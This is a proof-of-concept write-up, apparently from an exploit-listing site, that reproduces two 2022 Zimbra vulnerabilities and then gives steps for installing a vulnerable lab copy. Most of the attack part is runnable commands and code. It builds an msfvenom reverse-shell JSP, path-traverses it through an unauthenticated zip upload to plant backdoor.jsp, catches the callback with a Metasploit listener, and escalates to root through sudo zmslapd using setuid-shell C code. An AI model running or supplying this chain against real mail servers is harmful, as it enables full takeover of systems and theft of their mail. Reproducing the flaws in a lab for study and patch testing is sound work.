Share
## https://sploitus.com/exploit?id=8AD7E2C1-3DF4-597E-A28D-2C8907097174
# Zimbra 8.8.15 GA Patch 32 Exploitation

This is a proof of concept for the [CVE-2022-37042](https://nvd.nist.gov/vuln/detail/CVE-2022-37042) and [CVE-2022-37393](https://nvd.nist.gov/vuln/detail/CVE-2022-37393) vulnerabilities in zimbra collaboration suite 8.8.15 GA Patch 32 being one of the affected versions and the one being reproduced here.

This is a PoC aiming to reproduce an important vulnerability zimbra suffered in 2022.

To set up the PoC environment please refer to [Zimbra installation](#zimbra-88815-ga-patch-32-installation). After the environment is set up, we can start exploiting.

## CVE 37042 - Arbitrary File Upload

Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for [CVE-2022-27925](https://nvd.nist.gov/vuln/detail/CVE-2022-27925).

Originally, Zimbra called [CVE-2022-27925](https://nvd.nist.gov/vuln/detail/CVE-2022-27925) an authenticated path-traversal attack, where an administrative user could write files into any directory on the filesystem as the Zimbra account.Later, attackers exploiting this vulnerability found a way to bypass the administrative requirements. This new authentication bypass got a new identifier – [CVE-2022-37042](https://nvd.nist.gov/vuln/detail/CVE-2022-37042).

By combining the original path-traversal vulnerability and new authentication bypass, attackers can remotely compromise a Zimbra Collaboration Suite system via the administrator port (by default, 7071) anonymously.

The main issue in CVE ```/service/extension/backup/mboximport``` endpoint on Zimbra Collaboration Suite’s administrative port (7071 by default), which is designed to accept a .zip file import, does not validate paths and is therefore vulnerable to a path-traversal attack. A .zip file with a relative path can write anywhere on the file system. To demonstrate, we lets create a .zip file, then replace the name of the file inside with path traversal.

> [!NOTE]
> Replace the ```LHOST``` ip with your host's ip

Create a JSP payload using msfvenom.

```bash
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.101.8 LPORT=4444 -f jsp -o file.jsp
```

Create a zip file with the payload in it.

```bash
zip file.zip file.jsp
unzip -l file.zip
```

Now replace the name of the file inside the zip file with path traversal.

```bash
7z rn file.zip file.jsp ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp
unzip -l file.zip
```

> [!NOTE]
> Replace requests ip with your zimbra server's ip. 

Upload the file to the vulnerable endpoint ```/service/extension/backup/mboximport```.

```bash
curl -X POST -k 'https://10.10.101.9:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1' --data-binary @file.zip
```

Set up a Metasploit listener.

```bash
msf6 > use multi/handler

msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 10.10.101.8

msf6 exploit(multi/handler) > set LPORT 4444

msf6 exploit(multi/handler) > run -j
```

Now trigger the payload in the server, a meterpreter session will be spawned.

```bash
curl -k "https://10.10.101.9/public/backdoor.jsp"
```
## CVE 37393 - Privilege Escalation

If successfully exploited, a user with a shell account as the zimbra user we can use [CVE-2022-37393](https://nvd.nist.gov/vuln/detail/CVE-2022-37393) to escalate to root privileges.

While this issue requires a local account on the Zimbra host, we can get it as we just did with [CVE-2022-37042](https://nvd.nist.gov/vuln/detail/CVE-2022-37042). T

he core of the issue is that the Zimbra user account has passwordless sudo access to a bunch of different executables.

```bash
zimbra@zimbra:~$ sudo -l
Matching Defaults entries for zimbra on zimbra:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, !requiretty

User zimbra may run the following commands on zimbra:
    (root) NOPASSWD: /opt/zimbra/libexec/zmstat-fd *
    (root) NOPASSWD: /opt/zimbra/libexec/zmslapd
    (root) NOPASSWD: /opt/zimbra/common/sbin/postfix
    (root) NOPASSWD: /opt/zimbra/common/sbin/postalias
    (root) NOPASSWD: /opt/zimbra/common/sbin/qshape.pl
    (root) NOPASSWD: /opt/zimbra/common/sbin/postconf
    (root) NOPASSWD: /opt/zimbra/common/sbin/postsuper
    (root) NOPASSWD: /opt/zimbra/common/sbin/postcat
    (root) NOPASSWD: /opt/zimbra/libexec/zmqstat
    (root) NOPASSWD: /opt/zimbra/libexec/zmmtastatus
    (root) NOPASSWD: /opt/zimbra/common/sbin/amavis-mc
    (root) NOPASSWD: /opt/zimbra/common/sbin/nginx
    (root) NOPASSWD: /opt/zimbra/libexec/zmmailboxdmgr
```

[CVE-2022-37393](https://nvd.nist.gov/vuln/detail/CVE-2022-37393) specifically affects ```zmslapd```, which is a shell script that essentially runs **slapd** with a custom environment:

```bash
zimbra@zimbra:~$ cat /opt/zimbra/libexec/zmslapd 
#!/bin/bash
[...]

ulimit -n 32768
ulimit -c unlimited
ulimit -v unlimited
export LD_PRELOAD=/opt/zimbra/common/lib/libtcmalloc_minimal.so
exec /opt/zimbra/common/libexec/slapd "$@"
```

**slapd** is a standalone LDAP daemon, which can run as an arbitrary user and group:

```bash
zimbra@zimbra:~$ man slapd
[...]
-u user
       slapd  will  run  slapd with the specified user name or id, and that user's supplementary group access list as set with initgroups(3).  The group ID is also changed to this user's gid, unless the -g
       option is used to override.  Note when used with -r, slapd will use the user database in the change root environment.

       Note that on some systems, running as a non-privileged user will prevent passwd back-ends from accessing the encrypted passwords.  Note also that any shell back-ends will run as the  specified  non-
       privileged user.

-g group
       slapd will run with the specified group name or id.  Note when used with -r, slapd will use the group database in the change root environment.
```

And can accept a configuration file.

```bash
-f slapd-config-file
       Specifies the slapd configuration file. The default is /opt/zimbra/common/etc/openldap/slapd.conf.
```

Which can contain plugins.

```bash
zimbra@zimbra:~$ cat /opt/zimbra/common/etc/openldap/slapd.conf
[...]
# Load dynamic backend modules:
# modulepath	/opt/zimbra/common/libexec/openldap
# moduleload	back_mdb.la
# moduleload	back_ldap.la
```

We can use a very simple C program that spawns a shell (rootslap.c).

```bash
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
```

And a shared module that will setuid that shell so it runs as root (libhax.c).

```bash
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/slapper/rootslap", 0, 0);
    chmod("/tmp/slapper/rootslap", 04755);
    printf("[+] done!\n");
}
```

And a configuration file for slapd (slapd.conf).

```bash
modulepath	/tmp/slapper
moduleload	libhax.so
```

You can automate all this with his published proof of concept, but to run it directly (note that we simplified some of their compilation commands):

```bash
zimbra@zimbra:/tmp$ gcc -shared -o /tmp/slapper/libhax.so ./libhax.c                 
[...]
zimbra@zimbra:/tmp$ gcc -o /tmp/slapper/rootslap ./rootslap.c                        
[...]
zimbra@zimbra:/tmp$ sudo /opt/zimbra/libexec/zmslapd -u root -g root -f ./slapd.conf 
[+] done!
zimbra@zimbra:/tmp$ ls -l slapper/rootslap                                           
-rwsr-xr-x 1 root root 8480 Jul 21 22:18 slapper/rootslap
zimbra@zimbra:/tmp$ slapper/rootslap                                                 
# whoami
root
```

## Zimbra 8.8.815 GA Patch 32 Installation

This is a guide to reproduce a vulnerable zimbra containing the [CVE-2022-37042](https://nvd.nist.gov/vuln/detail/CVE-2022-37042) and [CVE-2022-37393](https://nvd.nist.gov/vuln/detail/CVE-2022-37393) vulnerabilities.

> [!Note] Clone the repository before continuing.

### Future Deprecation Solution

> [!NOTE]
> Continue to [normal installation](#normal-instalation) unless you already did and installation failed because of **missing packages**.

If one or more needed packages have been deleted from the official zimbra 8 repository, you can refer to this [google drive location](https://drive.google.com/file/d/1HkM6MKY9Gfv94TY2hVmWfXnR8GejD1Fh/view?usp=sharing) to download a ```tar.gz``` file which contains all needed packages for the successful installation of zimbra 8.8.15 patch 32.

After having downloaded the file, move it inside the cloned repository and extract its contents as following, you will end up with a directory named ```zimbra-8.8.15.p32-packages```.

```bash
tar -xzf zimbra-8p32-packages.tar.gz zimbra-8.8.15.p32-packages
```

> [!WARNING]
> The name of the directory containing the packages **MUST** be ```zimbra-8.8.15.p32-packages```.

Now you can proceed with the normal installation process.

### Normal Instalation

> [!IMPORTANT]
> You have to add a zimbra license ```.xml``` file to the repository, you can get a trial license on the [zimbra website](https://www.zimbra.com/connect/forms/?form=trial-license).

Being inside the cloned repository, run the installation script with root privileges.

```bash
sudo ./install-zimbra.sh
```

Wait until the ```Starting zimbra installation...``` message appears, you will be asked for input like ```Y``` for **Yes** or ```N``` for **NO** and more, be sure to do it as follows.

- For first two inputs enter ```Y``` as they are related to policies and agreements.

- Then it will be prompted ```Use Zimbra's package repository [Y]``` to which we MUST enter ```N``` in order for this to work.

> [!WARNING]
> If you enter ```Y``` the official zimbra 8 repository will be constructed and it will take precedence over the local repository for patch 32 leading the installation to fail.

- Then packages installation will be prompted out, input has to be as in the following table in order for the installation to complete successfully.

| Package                   | Input |
|---------------------------|-------|
|        zimbra-ldap        |   Y   |
|       zimbra-logger       |   Y   |
|         zimbra-mta        |   Y   |
|      zimbra-dnscache      |   N   |
|        zimbra-snmp        |   Y   |
|        zimbra-store       |   Y   |
|       zimbra-apache       |   Y   |
|        zimbra-spell       |   Y   |
|      zimbra-convertd      |   Y   |
|      zimbra-memcached     |   Y   |
|        zimbra-proxy       |   Y   |
|      zimbra-archiving     |   N   |
|        zimbra-drive       |   N   |
|        zimbra-imapd       |   N   |
| zimbra-network-modules-ng |   N   |
|        zimbra-chat        |   N   |


- It will be prompted ```The system will be modified.  Continue? [N]```, enter has to be ```Yes``` for the installation to continue.

- Then ```Change domain name? [Yes]```, press the ```return``` key or enter ```Yes``` and then press the ```return``` key.

- Now you will be prompted ```Create domain: [mail.example.com]``` and to which you will have to input the domain name part of the computer's hostname, e.g for hostname ```mail.company.net```, enter has to be ```company.net```. 

- A menu will be displayed, enter ```6``` to select zimbra store then enter ```4``` to set a password for the admin console, introduce a password and enter ```r``` before pressing the ```return``` key to go to previous menu.

- Now you have to open another terminal instance and edit ```/opt/zimbra/bin/zmcertmgr```, you will need root privileges to be able to edit the file.

```bash
sudo vim /opt/zimbra/bin/zmcertmgr
```

- Edit line 1821 and add "-nomac".

```bash
1817    @out = $self->run(
1818        $self->Openssl, "pkcs12", "-inkey", $keyf,
1819        "-in",          $crtf,    "-name",  $server,
1820        "-export",      "-out",   $pkcsf,   "-passout",
1821        "pass:$kpass",  "-nomac", "2>&1"
1822    );
```
- Do the same for line 1882. 

```bash
1878    @out = $self->run(
1879        $self->Openssl, "pkcs12", "-inkey", $keyf,
1880        "-in",          $crtf,    "-name",  $server,
1881        "-export",      "-out",   $pkcsf,   "-passout",
1882        "pass:$kpass",  "-nomac", "2>&1"
1883    );
```

- Save changes and return to the installation process where prompt ```Select from menu, or press 'a' to apply config (? - help) ``` was displayed, input ```a``` to apply config.

- When ```Save configuration data to a file? [Yes]``` prompt is displayed, press the ```return``` key or enter ```Yes``` and press the ```return``` key.

- When ```Save config in file: [/opt/zimbra/config.83161]``` prompt is displayed, press the ```return``` key.

- When ```The system will be modified - continue? [No]``` prompt is displayed, enter ```Yes``` before pressing the ```return``` key.

- Wait until installation finishes and press the ```return``` key.